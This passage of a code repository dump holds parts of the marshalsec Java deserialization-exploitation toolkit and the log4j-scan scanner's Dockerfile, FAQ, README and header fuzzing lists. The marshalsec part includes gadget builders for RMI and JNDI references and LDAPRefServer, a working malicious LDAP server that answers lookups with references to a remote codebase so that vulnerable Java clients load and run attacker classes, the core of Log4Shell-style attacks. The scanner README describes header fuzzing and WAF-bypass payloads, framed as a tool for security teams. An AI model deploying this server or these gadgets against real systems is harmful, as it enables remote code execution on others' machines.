sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.rmi.server.ObjID; 27 | import java.util.Random; 28 | 29 | import marshalsec.UtilFactory; 30 | import sun.rmi.server.UnicastRef; 31 | import sun.rmi.transport.LiveRef; 32 | import sun.rmi.transport.tcp.TCPEndpoint; 33 | 34 | 35 | /** 36 | * @author mbechler 37 | * 38 | */ 39 | public interface UnicastRefGadget extends Gadget { 40 | 41 | @Args ( minArgs = 2, args = { 42 | "host", "port" 43 | }, defaultArgs = { 44 | "localhost", "1099" 45 | }, noTest = true ) 46 | default Object makeUnicastRef ( UtilFactory uf, String... args ) { 47 | ObjID id = new ObjID(new Random().nextInt()); // RMI registry 48 | TCPEndpoint te = new TCPEndpoint(args[ 0 ], Integer.parseInt(args[ 1 ])); 49 | return new UnicastRef(new LiveRef(id, te, false)); 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/UnicastRemoteObjectGadget.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import marshalsec.UtilFactory; 27 | import marshalsec.util.Reflections; 28 | 29 | 30 | /** 31 | * @author mbechler 32 | * 33 | */ 34 | public interface UnicastRemoteObjectGadget extends Gadget { 35 | 36 | @Args ( args = { 37 | "port" 38 | }, noTest = true ) 39 | default Object makeUnicastRemoteObject ( UtilFactory uf, String... args ) throws Exception { 40 | java.rmi.server.UnicastRemoteObject uro = Reflections.createWithoutConstructor(java.rmi.server.UnicastRemoteObject.class); 41 | if ( args.length > 0 ) { 42 | Reflections.setFieldValue(uro, "port", Integer.parseInt(args[ 0 ])); 43 | } 44 | else { 45 | Reflections.setFieldValue(uro, "port", 6666); 46 | } 47 | return uro; 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/XBean.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import javax.naming.Context; 27 | import javax.naming.Reference; 28 | 29 | import org.apache.xbean.naming.context.ContextUtil.ReadOnlyBinding; 30 | import org.apache.xbean.naming.context.WritableContext; 31 | 32 | import marshalsec.MarshallerBase; 33 | import marshalsec.UtilFactory; 34 | import marshalsec.util.Reflections; 35 | 36 | 37 | /** 38 | * @author mbechler 39 | * 40 | */ 41 | public interface XBean extends Gadget { 42 | 43 | @Args ( minArgs = 2, args = { 44 | "codebase", "classname" 45 | }, defaultArgs = { 46 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 47 | } ) 48 | default Object makeXBean ( UtilFactory uf, String[] args ) throws Exception { 49 | Context ctx = Reflections.createWithoutConstructor(WritableContext.class); 50 | Reference ref = new Reference("foo", args[ 1 ], args[ 0 ]); 51 | ReadOnlyBinding binding = new ReadOnlyBinding("foo", ref, ctx); 52 | return uf.makeToStringTriggerUnstable(binding); // $NON-NLS-1$ 53 | } 54 | 55 | } 56 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/jndi/LDAPRefServer.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.jndi; 24 | 25 | 26 | import java.net.InetAddress; 27 | import java.net.MalformedURLException; 28 | import java.net.URL; 29 | 30 | import javax.net.ServerSocketFactory; 31 | import javax.net.SocketFactory; 32 | import javax.net.ssl.SSLSocketFactory; 33 | 34 | import com.unboundid.ldap.listener.InMemoryDirectoryServer; 35 | import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; 36 | import com.unboundid.ldap.listener.InMemoryListenerConfig; 37 | import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; 38 | import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; 39 | import com.unboundid.ldap.sdk.Entry; 40 | import com.unboundid.ldap.sdk.LDAPException; 41 | import com.unboundid.ldap.sdk.LDAPResult; 42 | import com.unboundid.ldap.sdk.ResultCode; 43 | 44 | 45 | /** 46 | * LDAP server implementation returning JNDI references 47 | * 48 | * @author mbechler 49 | * 50 | */ 51 | public class LDAPRefServer { 52 | 53 | private static final String LDAP_BASE = "dc=example,dc=com"; 54 | 55 | 56 | public static void main ( String[] args ) { 57 | int port = 1389; 58 | if ( args.length < 1 || args[ 0 ].indexOf('#') < 0 ) { 59 | System.err.println(LDAPRefServer.class.getSimpleName() + " []"); //$NON-NLS-1$ 60 | System.exit(-1); 61 | } 62 | else if ( args.length > 1 ) { 63 | port = Integer.parseInt(args[ 1 ]); 64 | } 65 | 66 | try { 67 | InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); 68 | config.setListenerConfigs(new InMemoryListenerConfig( 69 | "listen", //$NON-NLS-1$ 70 | InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$ 71 | port, 72 | ServerSocketFactory.getDefault(), 73 | SocketFactory.getDefault(), 74 | (SSLSocketFactory) SSLSocketFactory.getDefault())); 75 | 76 | config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ]))); 77 | InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); 78 | System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$ 79 | ds.startListening(); 80 | 81 | } 82 | catch ( Exception e ) { 83 | e.printStackTrace(); 84 | } 85 | } 86 | 87 | private static class OperationInterceptor extends InMemoryOperationInterceptor { 88 | 89 | private URL codebase; 90 | 91 | 92 | /** 93 | * 94 | */ 95 | public OperationInterceptor ( URL cb ) { 96 | this.codebase = cb; 97 | } 98 | 99 | 100 | /** 101 | * {@inheritDoc} 102 | * 103 | * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) 104 | */ 105 | @Override 106 | public void processSearchResult ( InMemoryInterceptedSearchResult result ) { 107 | String base = result.getRequest().getBaseDN(); 108 | Entry e = new Entry(base); 109 | try { 110 | sendResult(result, base, e); 111 | } 112 | catch ( Exception e1 ) { 113 | e1.printStackTrace(); 114 | } 115 | 116 | } 117 | 118 | 119 | protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException { 120 | URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); 121 | System.out.println("Received a request for: " + result.getRequest().getBaseDN()); 122 | e.addAttribute("javaClassName", "foo"); 123 | String cbstring = this.codebase.toString(); 124 | int refPos = cbstring.indexOf('#'); 125 | if ( refPos > 0 ) { 126 | cbstring = cbstring.substring(0, refPos); 127 | } 128 | e.addAttribute("javaCodeBase", cbstring); 129 | e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$ 130 | e.addAttribute("javaFactory", this.codebase.getRef()); 131 | result.sendSearchEntry(e); 132 | result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); 133 | } 134 | 135 | } 136 | } 137 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/util/Reflections.java: -------------------------------------------------------------------------------- 1 | package marshalsec.util; 2 | 3 | import java.lang.reflect.Constructor; 4 | import java.lang.reflect.Field; 5 | import java.lang.reflect.InvocationTargetException; 6 | 7 | import sun.reflect.ReflectionFactory; 8 | 9 | 10 | @SuppressWarnings ( "restriction" ) 11 | public class Reflections { 12 | 13 | public static Field getField ( final Class clazz, final String fieldName ) throws Exception { 14 | try { 15 | Field field = clazz.getDeclaredField(fieldName); 16 | if ( field != null ) 17 | field.setAccessible(true); 18 | else if ( clazz.getSuperclass() != null ) 19 | field = getField(clazz.getSuperclass(), fieldName); 20 | 21 | return field; 22 | } 23 | catch ( NoSuchFieldException e ) { 24 | if ( !clazz.getSuperclass().equals(Object.class) ) { 25 | return getField(clazz.getSuperclass(), fieldName); 26 | } 27 | throw e; 28 | } 29 | } 30 | 31 | 32 | public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception { 33 | final Field field = getField(obj.getClass(), fieldName); 34 | field.set(obj, value); 35 | } 36 | 37 | 38 | public static Object getFieldValue ( final Object obj, final String fieldName ) throws Exception { 39 | final Field field = getField(obj.getClass(), fieldName); 40 | return field.get(obj); 41 | } 42 | 43 | 44 | public static Constructor getFirstCtor ( final String name ) throws Exception { 45 | final Constructor ctor = Class.forName(name).getDeclaredConstructors()[ 0 ]; 46 | ctor.setAccessible(true); 47 | return ctor; 48 | } 49 | 50 | 51 | public static T createWithoutConstructor ( Class classToInstantiate ) 52 | throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { 53 | return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); 54 | } 55 | 56 | 57 | @SuppressWarnings ( { 58 | "unchecked" 59 | } ) 60 | public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, 61 | Object[] consArgs ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { 62 | Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); 63 | objCons.setAccessible(true); 64 | Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); 65 | sc.setAccessible(true); 66 | return (T) sc.newInstance(consArgs); 67 | } 68 | 69 | } 70 | -------------------------------------------------------------------------------- /ldap/src/test/java/GadgetsTest.java: -------------------------------------------------------------------------------- 1 | 2 | /* MIT License 3 | 4 | Copyright (c) 2017 Moritz Bechler 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in all 14 | copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | SOFTWARE. 23 | */ 24 | import org.junit.BeforeClass; 25 | import org.junit.Test; 26 | 27 | import marshalsec.BlazeDSAMF0; 28 | import marshalsec.BlazeDSAMF3; 29 | import marshalsec.BlazeDSAMF3AM; 30 | import marshalsec.BlazeDSAMFX; 31 | import marshalsec.Burlap; 32 | import marshalsec.Hessian; 33 | import marshalsec.JYAML; 34 | import marshalsec.Jackson; 35 | import marshalsec.Java; 36 | import marshalsec.JsonIO; 37 | import marshalsec.Kryo; 38 | import marshalsec.KryoAltStrategy; 39 | import marshalsec.MarshallerBase; 40 | import marshalsec.Red5AMF0; 41 | import marshalsec.Red5AMF3; 42 | import marshalsec.SnakeYAML; 43 | import marshalsec.XStream; 44 | import marshalsec.YAMLBeans; 45 | 46 | 47 | /** 48 | * @author mbechler 49 | * 50 | */ 51 | public class GadgetsTest { 52 | 53 | @BeforeClass 54 | public static void printVersion () { 55 | System.err.println("Java version is " + System.getProperty("java.vendor") + " " + System.getProperty("java.version")); 56 | } 57 | 58 | 59 | @Test 60 | public void blazeDSAMF0 () throws Exception { 61 | runTests(new BlazeDSAMF0()); 62 | } 63 | 64 | 65 | @Test 66 | public void blazeDSAMF3AM () throws Exception { 67 | runTests(new BlazeDSAMF3AM()); 68 | } 69 | 70 | 71 | @Test 72 | public void blazeDSAMF3 () throws Exception { 73 | runTests(new BlazeDSAMF3()); 74 | } 75 | 76 | 77 | @Test 78 | public void blazeDSAMFX () throws Exception { 79 | runTests(new BlazeDSAMFX()); 80 | } 81 | 82 | 83 | @Test 84 | public void burlap () throws Exception { 85 | runTests(new Burlap()); 86 | } 87 | 88 | 89 | @Test 90 | public void hessian () throws Exception { 91 | runTests(new Hessian()); 92 | } 93 | 94 | 95 | @Test 96 | public void jackson () throws Exception { 97 | runTests(new Jackson()); 98 | } 99 | 100 | 101 | @Test 102 | public void java () throws Exception { 103 | runTests(new Java()); 104 | } 105 | 106 | 107 | @Test 108 | public void jsonio () throws Exception { 109 | runTests(new JsonIO()); 110 | } 111 | 112 | 113 | @Test 114 | public void jyaml () throws Exception { 115 | runTests(new JYAML()); 116 | } 117 | 118 | 119 | @Test 120 | public void kryo () throws Exception { 121 | runTests(new Kryo()); 122 | } 123 | 124 | 125 | @Test 126 | public void kryoAlt () throws Exception { 127 | runTests(new KryoAltStrategy()); 128 | } 129 | 130 | 131 | @Test 132 | public void red5AMF0 () throws Exception { 133 | runTests(new Red5AMF0()); 134 | } 135 | 136 | 137 | @Test 138 | public void red5AMF3 () throws Exception { 139 | runTests(new Red5AMF3()); 140 | } 141 | 142 | 143 | @Test 144 | public void snakeyaml () throws Exception { 145 | runTests(new SnakeYAML()); 146 | } 147 | 148 | 149 | @Test 150 | public void xstream () throws Exception { 151 | runTests(new XStream()); 152 | } 153 | 154 | 155 | @Test 156 | public void yamlbeans () throws Exception { 157 | runTests(new YAMLBeans()); 158 | } 159 | 160 | 161 | private static void runTests ( MarshallerBase marshaller ) throws Exception { 162 | marshaller.runTests(); 163 | } 164 | 165 | } 166 | -------------------------------------------------------------------------------- /log4-scanner/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.11.0a5-alpine 2 | 3 | WORKDIR /app 4 | 5 | COPY requirements.txt requirements.txt 6 | 7 | RUN apk add gcc g++ make libffi-dev openssl-dev 8 | RUN pip3 install -r requirements.txt 9 | 10 | COPY . . 11 | 12 | ENTRYPOINT ["python", "log4j-scan.py" ] 13 | -------------------------------------------------------------------------------- /log4-scanner/FAQ.md: -------------------------------------------------------------------------------- 1 | # Frequently Asked Questions 2 | 3 | ## DNS callback error 4 | 5 | ``` 6 | Traceback (most recent call last): 7 | File "/Users/user/src/log4j-scan/log4j-scan.py", line 362, in 8 | main() 9 | File "/Users/user/src/log4j-scan/log4j-scan.py", line 332, in main 10 | dns_callback = Interactsh() 11 | File "/Users/darkcode/src/log4j-scan/log4j-scan.py", line 195, in init 12 | self.register() 13 | File "/Users/user/src/log4j-scan/log4j-scan.py", line 206, in register 14 | raise Exception("Can not initiate interact.sh DNS callback client") 15 | Exception: Can not initiate interact.sh DNS callback client 16 | ``` 17 | 18 | It means that the DNS callback provider is down, it's blocked on your network, or you can not connect to the DNS callback provider due to networking issues. You can use a custom DNS callback host with ` --custom-dns-callback-host`. 19 | 20 | --- 21 | 22 | ## Running with Python 2 23 | 24 | ``` 25 | File "log4j-scan.py", line 136 26 | fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}' 27 | ``` 28 | 29 | It should be related to Python 2 compatibility. The tool requires a modern version of Python 3. 30 | 31 | --- 32 | 33 | # Dependencies issue 34 | 35 | ``` 36 | File "/home/parallels/Log4j-RCE-Scanner/log4j-scan/log4j-scan.py", line 22, in 37 | from Crypto.Cipher import AES, PKCS1_OAEP 38 | ModuleNotFoundError: No module named 'Crypto' 39 | ``` 40 | 41 | This should be related to Pycrypto. Please install the latest Python PyCryptodome version. If you're still facing dependencies issues, you can use the Docker image. -------------------------------------------------------------------------------- /log4-scanner/LICENSE.txt: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2021 Mazin Ahmed 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /log4-scanner/README.md: -------------------------------------------------------------------------------- 1 |

log4j-scan

2 |

A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

3 | 4 | ![](https://dkh9ehwkisc4.cloudfront.net/static/files/80e52a5b-7d72-44c2-8187-76a2a58f5657-demo.png) 5 | 6 | 7 | # Features 8 | 9 | - Support for lists of URLs. 10 | - Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools). 11 | - Fuzzing for HTTP POST Data parameters. 12 | - Fuzzing for JSON data parameters. 13 | - Supports DNS callback for vulnerability discovery and validation. 14 | - WAF Bypass payloads. 15 | 16 | --- 17 | # 🚨 Announcement 18 | 19 | There is a patch bypass on Log4J v2.15.0 that allows a full RCE. FullHunt added community support for log4j-scan to reliably detect CVE-2021-45046. If you're having difficulty discovering and scanning your infrastructure at scale or keeping up with the Log4J threat, please get in touch at (team@fullhunt.io). 20 | 21 | ![](https://dkh9ehwkisc4.cloudfront.net/static/files/d385f9d8-e2b1-4d72-b9c2-a62c4c1c34a0-Screenshot-cve-2021-45046-demo.png) 22 | 23 | --- 24 | 25 | # Description 26 | 27 | We have been researching the Log4J RCE (CVE-2021-44228) since it was released, and we worked in preventing this vulnerability with our customers. We are open-sourcing an open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability. This shall be used by security teams to scan their infrastructure for Log4J RCE, and also test for WAF bypasses that can result in achiving code execution on the organization's environment. 28 | 29 | It supports DNS OOB callbacks out of the box, there is no need to setup a DNS callback server. 30 | 31 | 32 | 33 | 34 | # Usage 35 | 36 | ```python 37 | $ python3 log4j-scan.py -h 38 | [•] CVE-2021-44228 - Apache Log4j RCE Scanner 39 | [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. 40 | [•] Secure your External Attack Surface with FullHunt.io. 41 | usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] 42 | [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] 43 | 44 | optional arguments: 45 | -h, --help show this help message and exit 46 | -u URL, --url URL Check a single URL. 47 | -p PROXY, --proxy PROXY 48 | Send requests through proxy. proxy should be specified in the format supported by requests 49 | (http[s]://:) 50 | -l USEDLIST, --list USEDLIST 51 | Check a list of URLs. 52 | --request-type REQUEST_TYPE 53 | Request Type: (get, post) - [Default: get]. 54 | --headers-file HEADERS_FILE 55 | Headers fuzzing list - [default: headers.txt]. 56 | --run-all-tests Run all available tests on each URL. 57 | --exclude-user-agent-fuzzing 58 | Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents. 59 | --wait-time WAIT_TIME 60 | Wait time after all URLs are processed (in seconds) - [Default: 5]. 61 | --waf-bypass Extend scans with WAF bypass payloads. 62 | --test-CVE-2021-45046 63 | Test using payloads for CVE-2021-45046 (detection payloads). 64 | --dns-callback-provider DNS_CALLBACK_PROVIDER 65 | DNS Callback provider (Options: interact.sh) - [Default: interact.sh] 66 | --custom-ip-callback-host CUSTOM_IP_CALLBACK_HOST 67 | Option to specify IP address and Port instead of DNS Callback 68 | --custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST 69 | Custom DNS Callback Host. 70 | --disable-http-redirects 71 | Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems. 72 | ``` 73 | 74 | ## Scan a Single URL 75 | 76 | ```shell 77 | $ python3 log4j-scan.py -u https://log4j.lab.secbot.local 78 | ``` 79 | 80 | ## Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body) 81 | 82 | 83 | ```shell 84 | $ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests 85 | ``` 86 | 87 | ## Discover WAF bypasses on the environment. 88 | 89 | ```shell 90 | $ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass 91 | ``` 92 | 93 | ## Scan a list of URLs 94 | 95 | ```shell 96 | $ python3 log4j-scan.py -l urls.txt 97 | ``` 98 | 99 | # Installation 100 | 101 | ``` 102 | $ pip3 install -r requirements.txt 103 | ``` 104 | 105 | # Docker Support 106 | 107 | ```shell 108 | git clone https://github.com/fullhunt/log4j-scan.git 109 | cd log4j-scan 110 | sudo docker build -t log4j-scan . 111 | sudo docker run -it --rm log4j-scan 112 | 113 | # With URL list "urls.txt" in current directory 114 | docker run -it --rm -v $PWD:/data log4j-scan -l /data/urls.txt 115 | ``` 116 | 117 | # About FullHunt 118 | 119 | FullHunt is the next-generation attack surface management platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more. 120 | 121 | FullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges. 122 | 123 | # Legal Disclaimer 124 | This project is made for educational and ethical testing purposes only. Usage of log4j-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. 125 | 126 | 127 | # License 128 | The project is licensed under MIT License. 129 | 130 | 131 | # Author 132 | *Mazin Ahmed* 133 | * Email: *mazin at FullHunt.io* 134 | * FullHunt: [https://fullhunt.io](https://fullhunt.io) 135 | * Website: [https://mazinahmed.net](https://mazinahmed.net) 136 | * Twitter: [https://twitter.com/mazen160](https://twitter.com/mazen160) 137 | * Linkedin: [http://linkedin.com/in/infosecmazinahmed](http://linkedin.com/in/infosecmazinahmed) 138 | -------------------------------------------------------------------------------- /log4-scanner/headers-minimal.txt: -------------------------------------------------------------------------------- 1 | # Security appliances may reset requests when headers are larger then the typical. 2 | Accept-Charset 3 | Accept-Datetime 4 | Accept-Encoding 5 | Accept-Language 6 | Cache-Control 7 | Cookie 8 | DNT 9 | Forwarded 10 | Forwarded-For 11 | Forwarded-For-Ip 12 | Forwarded-Proto 13 | From 14 | Max-Forwards 15 | Origin 16 | Pragma 17 | Referer 18 | True-Client-IP 19 | Upgrade 20 | User-Agent 21 | Via 22 | Warning 23 | X-Api-Version 24 | X-Att-DeviceId 25 | X-Correlation-ID 26 | X-Csrf-Token 27 | X-Do-Not-Track 28 | X-Forwarded 29 | X-Forwarded-By 30 | X-Forwarded-For 31 | X-Forwarded-Host 32 | X-Forwarded-Port 33 | X-Forwarded-Proto 34 | X-Forwarded-Scheme 35 | X-Forwarded-Server 36 | X-Forwarded-Ssl 37 | X-Forward-For 38 | X-From 39 | X-Geoip-Country 40 | X-Http-Destinationurl 41 | X-Http-Host-Override 42 | X-Http-Method 43 | X-Http-Method-Override 44 | X-Hub-Signature 45 | X-If-Unmodified-Since 46 | X-ProxyUser-Ip 47 | X-Requested-With 48 | X-Request-ID 49 | X-UIDH 50 | X-XSRF-TOKEN -------------------------------------------------------------------------------- /log4-scanner/headers.txt: -------------------------------------------------------------------------------- 1 | Accept-Charset 2 | Accept-Datetime 3 | Accept-Encoding 4 | Accept-Language 5 | Cache-Control 6 | Cookie 7 | DNT 8 | Forwarded 9 | Forwarded-For 10 | Forwarded-For-Ip 11 | Forwarded-Proto 12 | From 13 | Max-Forwards 14 | Origin 15 | Pragma 16 | Referer 17 | TE 18 | True-Client-IP 19 | Upgrade 20 | User-Agent 21 | Via 22 | Warning 23 | X-Api-Version 24 | X-Att-Deviceid 25 | X-ATT-DeviceId 26 | X-Correlation-ID 27 | X-Csrf-Token 28 | X-CSRFToken 29 | X-Do-Not-Track 30 | X-Foo 31 | X-Foo-Bar 32 | X-Forwarded 33 | X-Forwarded-By 34 | X-Forwarded-For 35 | X-Forwarded-For-Original 36 | X-Forwarded-Host 37 | X-Forwarded-Port 38 | X-Forwarded-Proto 39 | X-Forwarded-Protocol 40 | X-Forwarded-Scheme 41 | X-Forwarded-Server 42 | X-Forwarded-Ssl 43 | X-Forwarder-For 44 | X-Forward-For 45 | X-Forward-Proto 46 | X-Frame-Options 47 | X-From 48 | X-Geoip-Country 49 | X-Http-Destinationurl 50 | X-Http-Host-Override 51 | X-Http-Method 52 | X-Http-Method-Override 53 | X-HTTP-Method-Override 54 | X-Http-Path-Override 55 | X-Https 56 | X-Htx-Agent 57 | X-Hub-Signature 58 | X-If-Unmodified-Since 59 | X-Imbo-Test-Config 60 | X-Insight 61 | X-Ip 62 | X-Ip-Trail 63 | X-ProxyUser-Ip 64 | X-Requested-With 65 | X-Request-ID 66 | X-UIDH 67 | X-Wap-Profile 68 | X-XSRF-TOKEN 